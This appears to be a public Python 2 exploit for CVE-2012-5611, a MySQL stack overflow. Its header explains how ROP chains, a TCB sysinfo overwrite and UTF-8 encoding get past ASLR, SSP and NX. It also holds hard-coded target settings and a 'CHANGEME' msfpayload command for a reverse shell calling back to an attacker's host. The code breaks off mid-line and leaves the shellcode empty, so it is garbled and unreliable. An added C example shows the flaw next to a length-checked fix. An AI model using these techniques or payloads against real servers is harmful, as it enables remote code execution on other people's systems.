MySQL Stack Buffer Overflow Linux x86 32bits

```python
#!/usr/bin/env python2
#27/12/12 - status : public release
#
#CVE-2012-5611 ( https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5611 )
#-------- Author : ipv
#-------- Impact : high
#-------- URL : http://blog.ring0.me/
#-------- Description
#
#The code below is linked to CVE-2012-5611, a flaw discovered by kingcope.
#MySQL server is prone to a remote buffer overflow that
#allows a remote authenticated attacker to reach code execution in the
#context of the user running the MySQL instance (default: mysql user).
#
#The vulnerability resides in the acl_get function, called when an authenticated
#user requests a privileged Account Management statement. MySQL fails
#to verify the user-controlled length of the "db" parameter.
#
#end=strmov((tmp_db=strmov(strmov(key, ip ? ip : "")+1,user)+1),db);
#
#The destination address of the copy is located on an mmapped page dedicated to
#the user connection, which allows a buffer overflow onto adjacent memory.
#
#Different attack vectors may be possible depending on the system.
#FYI Microsoft Windows versions are vulnerable as well.
#---------------------------------------------------------
#To bypass ASLR/SSP/RELRO/NX:
#------------------------------------------------------------------------------
#I take advantage of the threading model. This means MySQL uses only one address
#space for all MySQL resources (data structures, network management,
#session, etc.).
#To bypass SSP, i overwrite the sysinfo handler (pointing to the sysenter vdso) of
#the TCB structure located higher on the stack.
#ROP chains aim to pivot to our controlled stack data. At this point,
#if we overwrite the sysinfo handler, we cannot use ret2libc and/or the GOT
#dereferencing technique since the libc API relies on the sysinfo pointer
#to call sysenter.
#
#So to accomplish code exec, afaik, you have two ways :
#1 - Extract sysinfo of an intact TCB and use it as a proxy call
#(or you can restore the first sysinfo after doing modification on the got)
#-> i use it for the redhat exploit (no SSP on redhat/centos);
#-> this allows us to bypass relro/aslr/nx
#relro.
#2 - Find an int0x80 / sysenter gadget in .text ;
#(A bad instruction follows the int0x80 gadget, you have one shot to get
#code exec). So, i advise you to find a sysenter)
#- i use sysenter for ubuntu 10.04 self-compiled with SSP.
#- this allows us to bypass relro/ssp/aslr/nx
#
#Shellcodes are alphanum-mixed (skylined tool ftw). Exploit bypasses
#SSP/ASLR/NX.
#
#---------------------------------------------------------
#UTF-8 and ROP chains limitation :
#---------------------------------------------------------
#MySQL Schema Object Name restricts database names to be alphanumeric
#(and $ _).
#To bypass it, i use utf-8 encoding with bytes lower than 0x80. Encoding is
#done by MySQL when the database name is quoted with `` (mandatory to
#successfully exploit the target). Yes the devil is in the details.
#
#MySQL reference : https://dev.mysql.com/doc/refman/5.1/en/identifiers.html
#
#For any comments/job offer, mail me : ipv _at_ consortium-of-pwners . net

########################################################################
#Modules
#
import pymysql
import sys
import struct
import os, socket

########################################################################
#Authentication options
#
MYSQL_USER = "test"
MYSQL_PASSWORD = ""

#MYSQL_HOST = "192.168.130.147"
MYSQL_HOST = "192.168.130.129"
MYSQL_PORT = 3306

########################################################################
#Helper
#

def _x(v):
    if isinstance(v, str):
        return v
    return struct.pack("

#TCB is used when we face SSP
class _TCB:
    tcb = 0 #updated later by a ret gadget
    dtv = "BBBB"
    _self = "CCCC"
    multiple_threads = "DDDD"
    sysinfo = 0 #SEIP - updated later by stack pivot gadget
    stack_guard = "AAAA"
    pointer_guard = 0 #updated later by a pop pop ret gadget

#base class
class rc_base:
    eip_off = 0
    align_payload = 0
    align_stack = 2048
    retsled = ""
    safe_overwrite = ""
    pivot = ""
    pppr = ""
    ppr = ""

    #./msf/msfpayload linux/x86/shell_reverse_tcp2 LHOST=192.168.130.1 LPORT=4444 R | ./alpha2 esp
    #XXX - CHANGEME !
    sc_rev_tcp =
```
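The strmov chain quoted in the header is the whole bug: ip, user and db are copied back to back into one fixed key buffer and nothing compares the length of db with the space that remains. The C below is an added illustration, not MySQL's source: it rebuilds that pattern and puts a length-checked variant beside it. KEY_SIZE, the function names and the sample values are constructed for this example.

```c
/* Added example (not MySQL's code): the acl_get key-building pattern from
 * the header above, unbounded and length-checked side by side. The key
 * layout "ip\0user\0db\0" follows the quoted strmov chain; KEY_SIZE and
 * the function names are assumptions made for this illustration. */
#include <stddef.h>
#include <string.h>

#define KEY_SIZE 32   /* constructed: small enough that the check bites */

/* strmov(): copy src to dst and return a pointer to the written NUL. */
static char *strmov(char *dst, const char *src)
{
    while ((*dst++ = *src++) != '\0')
        ;
    return dst - 1;
}

/* Bytes the key needs, terminators included; computed before any write. */
size_t acl_key_needed(const char *ip, const char *user, const char *db)
{
    return strlen(ip ? ip : "") + 1 + strlen(user) + 1 + strlen(db) + 1;
}

/* Unchecked pattern: strlen(db) is never compared with the space left
 * after ip and user, so an over-long db runs past the end of key. */
char *acl_key_unchecked(char *key, const char *ip, const char *user, const char *db)
{
    char *tmp_db, *end;
    end = strmov((tmp_db = strmov(strmov(key, ip ? ip : "") + 1, user) + 1), db);
    (void)tmp_db;
    return end;
}

/* Checked variant: refuse (return -1) unless the whole key fits in
 * key_size bytes; otherwise build it and return the bytes used. */
int acl_key_checked(char *key, size_t key_size, const char *ip, const char *user, const char *db)
{
    size_t need = acl_key_needed(ip, user, db);
    if (need > key_size)
        return -1;                      /* reject before touching memory */
    acl_key_unchecked(key, ip, user, db);
    return (int)need;
}
```

The check must run before the copy: once strmov has started writing, the adjacent memory is already gone.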
